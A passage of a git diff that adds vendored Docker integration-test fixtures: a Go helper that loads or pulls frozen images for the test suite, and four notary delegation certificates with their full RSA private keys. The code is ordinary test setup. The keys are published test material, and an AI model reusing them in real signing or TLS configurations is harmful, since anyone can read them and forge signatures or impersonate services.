k1c(3;AOb{y2oM1xKm>>Y5g-CYfCvx)B0vO)z%wTBe{YUtx&QzG literal 0 HcmV?d00001 diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/load/frozen.go b/vendor/github.com/docker/docker/integration-cli/fixtures/load/frozen.go new file mode 100644 index 0000000000..13cd393f36 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/load/frozen.go @@ -0,0 +1,182 @@ +package load + +import ( + "bufio" + "bytes" + "os" + "os/exec" + "path/filepath" + "strings" + "sync" + + "github.com/pkg/errors" +) + +var frozenImgDir = "/docker-frozen-images" + +// FrozenImagesLinux loads the frozen image set for the integration suite +// If the images are not available locally it will download them +// TODO: This loads whatever is in the frozen image dir, regardless of what +// images were passed in. If the images need to be downloaded, then it will respect +// the passed in images +func FrozenImagesLinux(dockerBinary string, images ...string) error { + imgNS := os.Getenv("TEST_IMAGE_NAMESPACE") + var loadImages []struct{ srcName, destName string } + for _, img := range images { + if err := exec.Command(dockerBinary, "inspect", "--type=image", img).Run(); err != nil { + srcName := img + // hello-world:latest gets re-tagged as hello-world:frozen + // there are some tests that use hello-world:latest specifically so it pulls + // the image and hello-world:frozen is used for when we just want a super + // small image + if img == "hello-world:frozen" { + srcName = "hello-world:latest" + } + if imgNS != "" { + srcName = imgNS + "/" + srcName + } + loadImages = append(loadImages, struct{ srcName, destName string }{ + srcName: srcName, + destName: img, + }) + } + } + if len(loadImages) == 0 { + // everything is loaded, we're done + return nil + } + + fi, err := os.Stat(frozenImgDir) + if err != nil || !fi.IsDir() { + srcImages := make([]string, 0, len(loadImages)) + for _, img := range loadImages { + srcImages = append(srcImages, img.srcName) + } + if err := pullImages(dockerBinary, srcImages); err != nil { + return errors.Wrap(err, "error pulling image list") + } + } else { + if err := loadFrozenImages(dockerBinary); err != nil { + return err + } + } + + for _, img := range loadImages { + if img.srcName != img.destName { + if out, err := exec.Command(dockerBinary, "tag", img.srcName, img.destName).CombinedOutput(); err != nil { + return errors.Errorf("%v: %s", err, string(out)) + } + if out, err := exec.Command(dockerBinary, "rmi", img.srcName).CombinedOutput(); err != nil { + return errors.Errorf("%v: %s", err, string(out)) + } + } + } + return nil +} + +func loadFrozenImages(dockerBinary string) error { + tar, err := exec.LookPath("tar") + if err != nil { + return errors.Wrap(err, "could not find tar binary") + } + tarCmd := exec.Command(tar, "-cC", frozenImgDir, ".") + out, err := tarCmd.StdoutPipe() + if err != nil { + return errors.Wrap(err, "error getting stdout pipe for tar command") + } + + errBuf := bytes.NewBuffer(nil) + tarCmd.Stderr = errBuf + tarCmd.Start() + defer tarCmd.Wait() + + cmd := exec.Command(dockerBinary, "load") + cmd.Stdin = out + if out, err := cmd.CombinedOutput(); err != nil { + return errors.Errorf("%v: %s", err, string(out)) + } + return nil +} + +func pullImages(dockerBinary string, images []string) error { + cwd, err := os.Getwd() + if err != nil { + return errors.Wrap(err, "error getting path to dockerfile") + } + dockerfile := os.Getenv("DOCKERFILE") + if dockerfile == "" { + dockerfile = "Dockerfile" + } + dockerfilePath := filepath.Join(filepath.Dir(filepath.Clean(cwd)), dockerfile) + pullRefs, err := readFrozenImageList(dockerfilePath, images) + if err != nil { + return errors.Wrap(err, "error reading frozen image list") + } + + var wg sync.WaitGroup + chErr := make(chan error, len(images)) + for tag, ref := range pullRefs { + wg.Add(1) + go func(tag, ref string) { + defer wg.Done() + if out, err := exec.Command(dockerBinary, "pull", ref).CombinedOutput(); err != nil { + chErr <- errors.Errorf("%v: %s", string(out), err) + return + } + if out, err := exec.Command(dockerBinary, "tag", ref, tag).CombinedOutput(); err != nil { + chErr <- errors.Errorf("%v: %s", string(out), err) + return + } + if out, err := exec.Command(dockerBinary, "rmi", ref).CombinedOutput(); err != nil { + chErr <- errors.Errorf("%v: %s", string(out), err) + return + } + }(tag, ref) + } + wg.Wait() + close(chErr) + return <-chErr +} + +func readFrozenImageList(dockerfilePath string, images []string) (map[string]string, error) { + f, err := os.Open(dockerfilePath) + if err != nil { + return nil, errors.Wrap(err, "error reading dockerfile") + } + defer f.Close() + ls := make(map[string]string) + + scanner := bufio.NewScanner(f) + for scanner.Scan() { + line := strings.Fields(scanner.Text()) + if len(line) < 3 { + continue + } + if !(line[0] == "RUN" && line[1] == "./contrib/download-frozen-image-v2.sh") { + continue + } + + frozenImgDir = line[2] + if line[2] == frozenImgDir { + frozenImgDir = filepath.Join(os.Getenv("DEST"), "frozen-images") + } + + for scanner.Scan() { + img := strings.TrimSpace(scanner.Text()) + img = strings.TrimSuffix(img, "\\") + img = strings.TrimSpace(img) + split := strings.Split(img, "@") + if len(split) < 2 { + break + } + + for _, i := range images { + if split[0] == i { + ls[i] = img + break + } + } + } + } + return ls, nil +} diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey1.crt b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey1.crt new file mode 100644 index 0000000000..2218f23c89 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey1.crt @@ -0,0 +1,21 @@ +-----BEGIN CERTIFICATE----- +MIIDhTCCAm2gAwIBAgIJAP2EcMN2UXPcMA0GCSqGSIb3DQEBCwUAMFcxCzAJBgNV +BAYTAlVTMQswCQYDVQQIEwJDQTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMQ8wDQYD +VQQKEwZEb2NrZXIxEzARBgNVBAMTCmRlbGVnYXRpb24wHhcNMTYwOTI4MTc0ODQ4 +WhcNMjYwNjI4MTc0ODQ4WjBXMQswCQYDVQQGEwJVUzELMAkGA1UECBMCQ0ExFTAT +BgNVBAcTDFNhbkZyYW5jaXNjbzEPMA0GA1UEChMGRG9ja2VyMRMwEQYDVQQDEwpk +ZWxlZ2F0aW9uMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvgewhaYs +Ke5s2AM7xxKrT4A6n7hW17qSnBjonCcPcwTFmYqIOdxWjYITgJuHrTwB4ZhBqWS7 +tTsUUu6hWLMeB7Uo5/GEQAAZspKkT9G/rNKF9lbWK9PPhGGkeR01c/Q932m92Hsn +fCQ0Pp/OzD3nVTh0v9HKk+PObNMOCcqG87eYs4ylPRxs0RrE/rP+bEGssKQSbeCZ +wazDnO+kiatVgKQZ2CK23iFdRE1z2rzqVDeaFWdvBqrRdWnkOZClhlLgEQ5nK2yV +B6tSqOiI3MmHyHzIkGOQJp2/s7Pe0ckEkzsjTsJW8oKHlBBl6pRxHIKzNN4VFbeB +vvYvrogrDrC/owIDAQABo1QwUjAMBgNVHRMBAf8EAjAAMA4GA1UdDwEB/wQEAwIF +oDATBgNVHSUEDDAKBggrBgEFBQcDAzAdBgNVHQ4EFgQUFoHfukRa6qGk1ncON64Z +ASKlZdkwDQYJKoZIhvcNAQELBQADggEBAEq9Adpd03CPmpbRtTAJGAkjjLFr60sV +2r+/l/m9R31ZCN9ymM9nxToQ8zfMdeAh/nnPcErziil2gDVqXueCNDkRj09tmDIE +Q1Oc92uyNZNgcECow77cKZCTZSTku+qsJrYaykH5vSnia8ltcKj8inJedIcpBR+p +608HEQvF0Eg5eaLPJwH48BCb0Gqdri1dJgrNnqptz7MDr8M+u7tHVulbAd3YxLlq +JH1W2bkVUx6esbn/MUE5HL5iTuOYREEINvBSmLdmmFkampmCnCB/bDEyJeL9bAkt +ZPIi0UNSnqFKLSP1Vf8AGLXt6iO7+1OGvtsDXEEYdXVOMsSXZtUuT7A= +-----END CERTIFICATE----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey1.key b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey1.key new file mode 100644 index 0000000000..cb37efc94a --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey1.key @@ -0,0 +1,27 @@ +-----BEGIN RSA PRIVATE KEY----- +MIIEpAIBAAKCAQEAvgewhaYsKe5s2AM7xxKrT4A6n7hW17qSnBjonCcPcwTFmYqI +OdxWjYITgJuHrTwB4ZhBqWS7tTsUUu6hWLMeB7Uo5/GEQAAZspKkT9G/rNKF9lbW +K9PPhGGkeR01c/Q932m92HsnfCQ0Pp/OzD3nVTh0v9HKk+PObNMOCcqG87eYs4yl +PRxs0RrE/rP+bEGssKQSbeCZwazDnO+kiatVgKQZ2CK23iFdRE1z2rzqVDeaFWdv +BqrRdWnkOZClhlLgEQ5nK2yVB6tSqOiI3MmHyHzIkGOQJp2/s7Pe0ckEkzsjTsJW +8oKHlBBl6pRxHIKzNN4VFbeBvvYvrogrDrC/owIDAQABAoIBAB/o8KZwsgfUhqh7 +WoViSCwQb0e0z7hoFwhpUl4uXPTGf1v6HEgDDPG0PwwgkdbwNaypQZVtWevj4NTQ +R326jjdjH1xbfQa2PZpz722L3jDqJR6plEtFxRoIv3KrCffPsrgabIu2mnnJJpDB +ixtW5cq0sT4ov2i4H0i85CWWwbSY/G/MHsvCuK9PhoCj9uToVqrf1KrAESE5q4fh +mPSYUL99KVnj7SZkUz+79rc8sLLPVks3szZACMlm1n05ZTj/d6Nd2ZZUO45DllIj +1XJghfWmnChrB/P/KYXgQ3Y9BofIAw1ra2y3wOZeqRFNsbmojcGldfdtN/iQzhEj +uk4ThokCgYEA9FTmv36N8qSPWuqX/KzkixDQ8WrDGohcB54kK98Wx4ijXx3i38SY +tFjO8YUS9GVo1+UgmRjZbzVX7xeum6+TdBBwOjNOxEQ4tzwiQBWDdGpli8BccdJ2 +OOIVxSslWhiUWfpYloXVetrR88iHbT882g795pbonDaJdXSLnij4UW8CgYEAxxrr +QFpsmOEZvI/yPSOGdG7A1RIsCeH+cEOf4cKghs7+aCtAHlIweztNOrqirl3oKI1r +I0zQl46WsaW8S/y99v9lmmnZbWwqLa4vIu0NWs0zaZdzKZw3xljMhgp4Ge69hHa2 +utCtAxcX+7q/yLlHoTiYwKdxX54iLkheCB8csw0CgYEAleEG820kkjXUIodJ2JwO +Tihwo8dEC6CeI6YktizRgnEVFqH0rCOjMO5Rc+KX8AfNOrK5PnD54LguSuKSH7qi +j04OKgWTSd43lF90+y63RtCFnibQDpp2HwrBJAQFk7EEP/XMJfnPLN/SbuMSADgM +kg8kPTFRW5Iw3DYz9z9WpE0CgYAkn6/8Q2XMbUOFqti9JEa8Lg8sYk5VdwuNbPMA +3QMYKQUk9ieyLB4c3Nik3+XCuyVUKEc31A5egmz3umu7cn8i6vGuiJ/k/8t2YZ7s +Bry5Ihu95Yzab5DW3Eiqs0xKQN79ebS9AluAwQO5Wy2h52rknfuDHIm/M+BHsSoS +xl5KFQKBgQCokCsYuX1z2GojHw369/R2aX3ovCGuHqy4k7fWxUrpHTHvth2+qNPr +84qLJ9rLWoZE5sUiZ5YdwCgW877EdfkT+v4aaBX79ixso5VdqgJ/PdnoNntah/Vq +njQiW1skn6/P5V/eyimN2n0VsyBr/zMDEtYTRP/Tb1zi/njFLQkZEA== +-----END RSA PRIVATE KEY----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey2.crt b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey2.crt new file mode 100644 index 0000000000..bec084790a --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey2.crt @@ -0,0 +1,21 @@ +-----BEGIN CERTIFICATE----- +MIIDhTCCAm2gAwIBAgIJAIq8naKlYAQfMA0GCSqGSIb3DQEBCwUAMFcxCzAJBgNV +BAYTAlVTMQswCQYDVQQIEwJDQTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMQ8wDQYD +VQQKEwZEb2NrZXIxEzARBgNVBAMTCmRlbGVnYXRpb24wHhcNMTYwOTI4MTc0ODQ4 +WhcNMjYwNjI4MTc0ODQ4WjBXMQswCQYDVQQGEwJVUzELMAkGA1UECBMCQ0ExFTAT +BgNVBAcTDFNhbkZyYW5jaXNjbzEPMA0GA1UEChMGRG9ja2VyMRMwEQYDVQQDEwpk +ZWxlZ2F0aW9uMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAyY2EWYTW +5VHipw08t675upmD6a+akiuZ1z+XpuOxZCgjZ0aHfoOe8wGKg3Ohz7UCBdD5Mob/ +L/qvRlsCaqPHGZKIyyX1HDO4mpuQQFBhYxt+ZAO3AaawEUOw2rwwMDEjLnDDTSZM +z8jxCMvsJjBDqgb8g3z+AmjducQ/OH6llldgHIBY8ioRbROCL2PGgqywWq2fThav +c70YMxtKviBGDNCouYeQ8JMK/PuLwPNDXNQAagFHVARXiUv/ILHk7ImYnSGJUcuk +JTUGN2MBnpY0eakg7i+4za8sjjqOdn+2I6aVzlGJDSiRP72nkg/cE4BqMl9FrMwK +9iS8xa9yMDLUvwIDAQABo1QwUjAMBgNVHRMBAf8EAjAAMA4GA1UdDwEB/wQEAwIF +oDATBgNVHSUEDDAKBggrBgEFBQcDAzAdBgNVHQ4EFgQUvQzzFmh3Sv3HcdExY3wx +/1u6JLAwDQYJKoZIhvcNAQELBQADggEBAJcmDme2Xj/HPUPwaN/EyCmjhY73EiHO +x6Pm16tscg5JGn5A+u3CZ1DmxUYl8Hp6MaW/sWzdtL0oKJg76pynadCWh5EacFR8 +u+2GV/IcN9mSX6JQzvrqbjSqo5/FehqBD+W5h3euwwApWA3STAadYeyEfmdOA3SQ +W1vzrA1y7i8qgTqeJ7UX1sEAXlIhBK2zPYaMB+en+ZOiPyNxJYj6IDdGdD2paC9L +6H9wKC+GAUTSdCWp89HP7ETSXEGr94AXkrwU+qNsiN+OyK8ke0EMngEPh5IQoplw +/7zEZCth3oKxvR1/4S5LmTVaHI2ZlbU4q9bnY72G4tw8YQr2gcBGo4w= +-----END CERTIFICATE----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey2.key b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey2.key new file mode 100644 index 0000000000..5ccabe908f --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey2.key @@ -0,0 +1,27 @@ +-----BEGIN RSA PRIVATE KEY----- +MIIEogIBAAKCAQEAyY2EWYTW5VHipw08t675upmD6a+akiuZ1z+XpuOxZCgjZ0aH +foOe8wGKg3Ohz7UCBdD5Mob/L/qvRlsCaqPHGZKIyyX1HDO4mpuQQFBhYxt+ZAO3 +AaawEUOw2rwwMDEjLnDDTSZMz8jxCMvsJjBDqgb8g3z+AmjducQ/OH6llldgHIBY +8ioRbROCL2PGgqywWq2fThavc70YMxtKviBGDNCouYeQ8JMK/PuLwPNDXNQAagFH +VARXiUv/ILHk7ImYnSGJUcukJTUGN2MBnpY0eakg7i+4za8sjjqOdn+2I6aVzlGJ +DSiRP72nkg/cE4BqMl9FrMwK9iS8xa9yMDLUvwIDAQABAoIBAHmffvzx7ydESWwa +zcfdu26BkptiTvjjfJrqEd4wSewxWGPKqJqMXE8xX99A2KTZClZuKuH1mmnecQQY +iRXGrK9ewFMuHYGeKEiLlPlqR8ohXhyGLVm+t0JDwaXMp5t9G0i73O5iLTm5fNGd +FGxa9YnVW20Q8MqNczbVGH1D1zInhxzzOyFzBd4bBBJ8PdrUdyLpd7+RxY2ghnbT +p9ZANR2vk5zmDLJgZx72n/u+miJWuhY6p0v3Vq4z/HHgdhf+K6vpDdzTcYlA0rO4 +c/c+RKED3ZadGUD5QoLsmEN0e3FVSMPN1kt4ZRTqWfH8f2X4mLz33aBryTjktP6+ +1rX6ThECgYEA74wc1Tq23B5R0/GaMm1AK3Ko2zzTD8wK7NSCElh2dls02B+GzrEB +aE3A2GMQSuzb+EA0zkipwANBaqs3ZemH5G1pu4hstQsXCMd4jAJn0TmTXlplXBCf +PSc8ZUU6XcJENRr9Q7O9/TGlgahX+z0ndxYx/CMCsSu7XsMg4IZsbAcCgYEA12Vb +wKOVG15GGp7pMshr+2rQfVimARUP4gf3JnQmenktI4PfdnMW3a4L3DEHfLhIerwT +6lRp/NpxSADmuT4h1UO1l2lc+gmTVPw0Vbl6VwHpgS5Kfu4ZyM6n3S66f/dE4nu7 +hQF9yZz7vn5Agghak4p6a1wC1gdMzR1tvxFzk4kCgYByBMTskWfcWeok8Yitm+bB +R3Ar+kWT7VD97SCETusD5uG+RTNLSmEbHnc+B9kHcLo67YS0800pAeOvPBPARGnU +RmffRU5I1iB+o0MzkSmNItSMQoagTaEd4IEUyuC/I+qHRHNsOC+kRm86ycAm67LP +MhdUpe1wGxqyPjp15EXTHQKBgDKzFu+3EWfJvvKRKQ7dAh3BvKVkcl6a2Iw5l8Ej +YdM+JpPPfI/i8yTmzL/dgoem0Nii4IUtrWzo9fUe0TAVId2S/HFRSaNJEbbVTnRH +HjbQqmfPv5U08jjD+9siHp/0UfCFc1QRT8xe+RqTmReCY9+KntoaZEiAm2FEZgqt +TukRAoGAf7QqbTP5/UH1KSkX89F5qy/6GS3pw6TLj9Ufm/l/NO8Um8gag6YhEKWR +7HpkpCqjfWj8Av8ESR9cqddPGrbdqXFm9z7dCjlAd5T3Q3h/h+v+JzLQWbsI6WOb +SsOSWNyE006ZZdIiFwO6GfxpLI24sVtYKgyob6Q71oxSqfnrnT0= +-----END RSA PRIVATE KEY----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey3.crt b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey3.crt new file mode 100644 index 0000000000..f434b45fc8 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey3.crt @@ -0,0 +1,21 @@ +-----BEGIN CERTIFICATE----- +MIIDhTCCAm2gAwIBAgIJAKHt/jxiWqMtMA0GCSqGSIb3DQEBCwUAMFcxCzAJBgNV +BAYTAlVTMQswCQYDVQQIEwJDQTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMQ8wDQYD +VQQKEwZEb2NrZXIxEzARBgNVBAMTCmRlbGVnYXRpb24wHhcNMTYwOTI4MTc0ODQ5 +WhcNMjYwNjI4MTc0ODQ5WjBXMQswCQYDVQQGEwJVUzELMAkGA1UECBMCQ0ExFTAT +BgNVBAcTDFNhbkZyYW5jaXNjbzEPMA0GA1UEChMGRG9ja2VyMRMwEQYDVQQDEwpk +ZWxlZ2F0aW9uMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqfbJk2Dk +C9FJVjV2+Q2CQrJphG3vFc1Qlu9jgVA5RhGmF9jJzetsclsV/95nBhinIGcSmPQA +l318G7Bz/cG/6O2n5+hj+S1+YOvQweReZj3d4kCeS86SOyLNTpMD9gsF0S8nR1RN +h0jD4t1vxAVeGD1o61U8/k0O5eDoeOfOSWZagKk5PhyrMZgNip4IrG46umCkFlrw +zMMcgQdwTQXywPqkr/LmYpqT1WpMlzHYTQEY8rKorIJQbPtHVYdr4UxYnNmk6fbU +biEP1DQlwjBWcFTsDLqXKP/K+e3O0/e/hMB0y7Tj9fZ7Viw0t5IKXZPsxMhwknUT +9vmPzIJO6NiniwIDAQABo1QwUjAMBgNVHRMBAf8EAjAAMA4GA1UdDwEB/wQEAwIF +oDATBgNVHSUEDDAKBggrBgEFBQcDAzAdBgNVHQ4EFgQUdTXRP1EzxQ+UDZSoheVo +Mobud1cwDQYJKoZIhvcNAQELBQADggEBADV9asTWWdbmpkeRuKyi0xGho39ONK88 +xxkFlco766BVgemo/rGQj3oPuw6M6SzHFoJ6JUPjmLiAQDIGEU/2/b6LcOuLjP+4 +YejCcDTY3lSW/HMNoAmzr2foo/LngNGfe/qhVFUqV7GjFT9+XzFFBfIZ1cQiL2ed +kc8rgQxFPwWXFCSwaENWeFnMDugkd+7xanoAHq8GsJpg5fTruDTmJkUqC2RNiMLn +WM7QaqW7+lmUnMnc1IBoz0hFhgoiadWM/1RQxx51zTVw6Au1koIm4ZXu5a+/WyC8 +K1+HyUbc0AVaDaRBpRSOR9aHRwLGh6WQ4aUZQNyJroc999qfYrDEEV8= +-----END CERTIFICATE----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey3.key b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey3.key new file mode 100644 index 0000000000..a61d18cc3d --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey3.key @@ -0,0 +1,27 @@ +-----BEGIN RSA PRIVATE KEY----- +MIIEpQIBAAKCAQEAqfbJk2DkC9FJVjV2+Q2CQrJphG3vFc1Qlu9jgVA5RhGmF9jJ +zetsclsV/95nBhinIGcSmPQAl318G7Bz/cG/6O2n5+hj+S1+YOvQweReZj3d4kCe +S86SOyLNTpMD9gsF0S8nR1RNh0jD4t1vxAVeGD1o61U8/k0O5eDoeOfOSWZagKk5 +PhyrMZgNip4IrG46umCkFlrwzMMcgQdwTQXywPqkr/LmYpqT1WpMlzHYTQEY8rKo +rIJQbPtHVYdr4UxYnNmk6fbUbiEP1DQlwjBWcFTsDLqXKP/K+e3O0/e/hMB0y7Tj +9fZ7Viw0t5IKXZPsxMhwknUT9vmPzIJO6NiniwIDAQABAoIBAQCAr/ed3A2umO7T +FDYZik3nXBiiiW4t7r+nGGgZ3/kNgY1lnuHlROxehXLZwbX1mrLnyML/BjhwezV9 +7ZNVPd6laVPpNj6DyxtWHRZ5yARlm1Al39E7CpQTrF0QsiWcpGnqIa62xjDRTpnq +askV/Q5qggyvqmE9FnFCQpEiAjlhvp7F0kVHVJm9s3MK3zSyR0UTZ3cpYus2Jr2z +OotHgAMHq5Hgb3dvxOeE2xRMeYAVDujbkNzXm2SddAtiRdLhWDh7JIr3zXhp0HyN +4rLOyhlgz00oIGeDt/C0q3fRmghr3iZOG+7m2sUx0FD1Ru1dI9v2A+jYmIVNW6+x +YJk5PzxJAoGBANDj7AGdcHSci/LDBPoTTUiz3uucAd27/IJma/iy8mdbVfOAb0Fy +PRSPvoozlpZyOxg2J4eH/o4QxQR4lVKtnLKZLNHK2tg3LarwyBX1LiI3vVlB+DT1 +AmV8i5bJAckDhqFeEH5qdWZFi03oZsSXWEqX5iMYCrdK5lTZggcrFZeHAoGBANBL +fkk3knAdcVfTYpmHx18GBi2AsCWTd20KD49YBdbVy0Y2Jaa1EJAmGWpTUKdYx40R +H5CuGgcAviXQz3bugdTU1I3tAclBtpJNU7JkhuE+Epz0CM/6WERJrE0YxcGQA5ui +6fOguFyiXD1/85jrDBOKy74aoS7lYz9r/a6eqmjdAoGBAJpm/nmrIAZx+Ff2ouUe +A1Ar9Ch/Zjm5zEmu3zwzOU4AiyWz14iuoktifNq2iyalRNz+mnVpplToPFizsNwu +C9dPtXtU0DJlhtIFrD/evLz6KnGhe4/ZUm4lgyBvb2xfuNHqL5Lhqelwmil6EQxb +Oh3Y7XkfOjyFln89TwlxZUJdAoGAJRMa4kta7EvBTeGZLjyltvsqhFTghX+vBSCC +ToBbYbbiHJgssXSPAylU4sD7nR3HPwuqM6VZip+OOMrm8oNXZpuPTce+xqTEq1vK +JvmPrG3RAFDLdMFZjqYSXhKnuGE60yv3Ol8EEbDwfB3XLQPBPYU56Jdy0xcPSE2f +dMJXEJ0CgYEAisZw0nXw6lFeYecu642EGuU0wv1O9i21p7eho9QwOcsoTl4Q9l+M +M8iBv+qTHO+D19l4JbkGvy2H2diKoYduUFACcuiFYs8fjrT+4Z6DyOQAQGAf6Ylw +BFbU15k6KbA9v4mZDfd1tY9x62L/XO55ZxYG+J+q0e26tEThgD8cEog= +-----END RSA PRIVATE KEY----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey4.crt b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey4.crt new file mode 100644 index 0000000000..c8cbe46bdf --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey4.crt @@ -0,0 +1,21 @@ +-----BEGIN CERTIFICATE----- +MIIDhTCCAm2gAwIBAgIJANae++ZkUEWMMA0GCSqGSIb3DQEBCwUAMFcxCzAJBgNV +BAYTAlVTMQswCQYDVQQIEwJDQTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMQ8wDQYD +VQQKEwZEb2NrZXIxEzARBgNVBAMTCmRlbGVnYXRpb24wHhcNMTYwOTI4MTc0ODQ5 +WhcNMjYwNjI4MTc0ODQ5WjBXMQswCQYDVQQGEwJVUzELMAkGA1UECBMCQ0ExFTAT +BgNVBAcTDFNhbkZyYW5jaXNjbzEPMA0GA1UEChMGRG9ja2VyMRMwEQYDVQQDEwpk +ZWxlZ2F0aW9uMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqULAjgba +Y2I10WfqdmYnPfEqEe6iMDbzcgECb2xKafXcI4ltkQj1iO4zBTs0Ft9EzXFc5ZBh +pTjZrL6vrIa0y/CH2BiIHBJ0wRHx/40HXp4DSj3HZpVOlEMI3npRfBGNIBllUaRN +PWG7zL7DcKMIepBfPXyjBsxzH3yNiISq0W5hSiy+ImhSo3aipJUHHcp9Z9NgvpNC +3QvnxsGKRnECmDRDlxkq+FQu9Iqs/HWFYWgyfcsw+YTrWZq3qVnnqUouHO//c9PG +Ry3sZSDU97MwvkjvWys1e01Xvd3AbHx08YAsxih58i/OBKe81eD9NuZDP2KrjTxI +5xkXKhj6DV2NnQIDAQABo1QwUjAMBgNVHRMBAf8EAjAAMA4GA1UdDwEB/wQEAwIF +oDATBgNVHSUEDDAKBggrBgEFBQcDAzAdBgNVHQ4EFgQUDt95hiqbQvi0KcvZGAUu +VisnztQwDQYJKoZIhvcNAQELBQADggEBAGi7qHai7MWbfeu6SlXhzIP3AIMa8TMi +lp/+mvPUFPswIVqYJ71MAN8uA7CTH3z50a2vYupGeOEtZqVJeRf+xgOEpwycncxp +Qz6wc6TWPVIoT5q1Hqxw1RD2MyKL+Y+QBDYwFxFkthpDMlX48I9frcqoJUWFxBF2 +lnRr/cE7BbPE3sMbXV3wGPlH7+eUf+CgzXJo2HB6THzagyEgNrDiz/0rCQa1ipFd +mNU3D/U6BFGmJNxhvSOtXX9escg8yjr05YwwzokHS2K4jE0ZuJPBd50C/Rvo3Mf4 +0h7/2Q95e7d42zPe9WYPu2F8KTWsf4r+6ddhKrKhYzXIcTAfHIOiO+U= +-----END CERTIFICATE----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey4.key b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey4.key new file mode 100644 index 0000000000..f473cc495a --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey4.key @@ -0,0 +1,27 @@ +-----BEGIN RSA PRIVATE KEY----- +MIIEpAIBAAKCAQEAqULAjgbaY2I10WfqdmYnPfEqEe6iMDbzcgECb2xKafXcI4lt +kQj1iO4zBTs0Ft9EzXFc5ZBhpTjZrL6vrIa0y/CH2BiIHBJ0wRHx/40HXp4DSj3H +ZpVOlEMI3npRfBGNIBllUaRNPWG7zL7DcKMIepBfPXyjBsxzH3yNiISq0W5hSiy+ +ImhSo3aipJUHHcp9Z9NgvpNC3QvnxsGKRnECmDRDlxkq+FQu9Iqs/HWFYWgyfcsw ++YTrWZq3qVnnqUouHO//c9PGRy3sZSDU97MwvkjvWys1e01Xvd3AbHx08YAsxih5 +8i/OBKe81eD9NuZDP2KrjTxI5xkXKhj6DV2NnQIDAQABAoIBAGK0ZKnuYSiXux60 +5MvK4pOCsa/nY3mOcgVHhW4IzpRgJdIrcFOlz9ncXrBsSAIWjX7o3u2Ydvjs4DOW +t8d6frB3QiDInYcRVDjLCD6otWV97Bk9Ua0G4N4hAWkMF7ysV4oihS1JDSoAdo39 +qOdki6s9yeyHZGKwk2oHLlowU5TxQMBA8DHmxqBII1HTm+8xRz45bcEqRXydYSUn +P1JuSU9jFqdylxU+Nrq6ehslMQ3y7qNWQyiLGxu6EmR+vgrzSU0s3iAOqCHthaOS +VBBXPL3DNEYUS+0QGnGrACuJhanOMBfdiO6Orelx6ZzWZm38PNGv0yBt0WCM+8/A +TtQNGkECgYEA1LqR6AH9XikUQ0+rM4526BgVuYqtjw21h4Lj9alaA+YTQntBBJOv +iAcUpnJiV4T8jzAMLeqpK8R/rbxRnK5S9jOV2gr+puk4L6tH46cgahBUESDigDp8 +6vK8ur6ubBcXNPh3AT6rsPj+Ph2EU3raqiYdouvCdga/OCYZb+jr6UkCgYEAy7Cr +l8WssI/8/ORcQ4MFJFNyfz/Y2beNXyLd1PX0H+wRSiGcKzeUuTHNtzFFpMbrK/nx +ZOPCT2ROdHsBHzp1L+WquCb0fyMVSiYiXBU+VCFDbUU5tBr3ycTc7VwuFPENOiha +IdlWgew/aW110FQHIaqe9g+htRe+mXe++faZtbUCgYB/MSJmNzJX53XvHSZ/CBJ+ +iVAMBSfq3caJRLCqRNzGcf1YBbwFUYxlZ95n+wJj0+byckcF+UW3HqE8rtmZNf3y +qTtTCLnj8JQgpGeybU4LPMIXD7N9+fqQvBwuCC7gABpnGJyHCQK9KNNTLnDdPRqb +G3ki3ZYC3dvdZaJV8E2FyQKBgQCMa5Mf4kqWvezueo+QizZ0QILibqWUEhIH0AWV +1qkhiKCytlDvCjYhJdBnxjP40Jk3i+t6XfmKud/MNTAk0ywOhQoYQeKz8v+uSnPN +f2ekn/nXzq1lGGJSWsDjcXTjQvqXaVIZm7cjgjaE+80IfaUc9H75qvUT3vaq3f5u +XC7DMQKBgQDMAzCCpWlEPbZoFMl6F49+7jG0/TiqM/WRUSQnNtufPMbrR9Je4QM1 +L1UCANCPaHFOncKYer15NfIV1ctt5MZKImevDsUaQO8CUlO+dzd5H8KvHw9E29gA +B22v8k3jIjsYeRL+UJ/sBnWHgxdAe/NEM+TdlP2oP9D1gTifutPqAg== +-----END RSA PRIVATE KEY----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/gen.sh 